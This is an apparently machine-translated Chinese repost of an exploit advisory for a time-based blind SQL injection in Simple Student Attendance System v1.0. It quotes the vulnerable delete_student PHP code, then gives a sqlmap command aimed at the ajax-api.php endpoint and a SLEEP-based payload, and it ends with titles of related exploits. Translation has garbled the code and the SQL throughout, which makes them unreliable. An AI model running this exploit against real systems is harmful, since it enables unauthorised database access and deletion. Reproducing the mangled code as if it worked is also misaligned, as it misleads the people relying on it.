简单的学生出勤系统v1.0-基于时间的盲目SQL注入

[HackApt-37 Team已验证会员]

＃利用标题:简单的学生出勤系统- 基于时间基于盲目的SQL注入
＃DATE: 2023年12月26日
＃利用作者: Gnanaraj Mauviel（@0xm3m）
＃vendor: oretnom23
＃供应商homepage3360 https://www.sourcecodester.com/php/...ystem-system-using-php-and-php-and-mysql.html
＃软件link: https://www.sourcecodester.com/sites/default/files/files/download/oretnom23/php-php-antendance.zip
＃版本: V1.0
＃在: Mac OSX，XAMPP，Apache，MySQL上测试
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
源代码（/php-andendance/classes/actions.class.php）:
公共功能delete_student（）{
提取（$ _ post）;
$ delete=$ this-conn-Query（'drete fref`sustement_tbl`whene d` id`='{$ id}''）;
如果（$ delete）{
$ _session ['flashdata']=['type'='成功'，'msg'='学生已成功删除！' ];
返回['状态'='成功'];
}别的{
$ _session ['flashdata']=['type'='danger'，'msg'='学生由于未知原因而未能删除！” ];
返回['status'='错误'，“学生未能删除！” ];
}
}
-sqlmap -u'http://localhost/php-andendance/ajax-api.php？action=delete_student' - data='id=7'' - technique=t-batch-batch
---
参数: ID（发布）
Type:基于时间的盲人
title: mysql=5.0.12和基于时间的盲人（查询睡眠）
PAYLOAD: ID=7'和（从（Select（Sleep（5）））KVAW）和'vafw'='vafw
---

 

H

简单的学生出勤系统v1.0-“ classID”基于盲人联盟的SQL注入

H

房地产管理系统v1.0-通过文件上传执行远程代码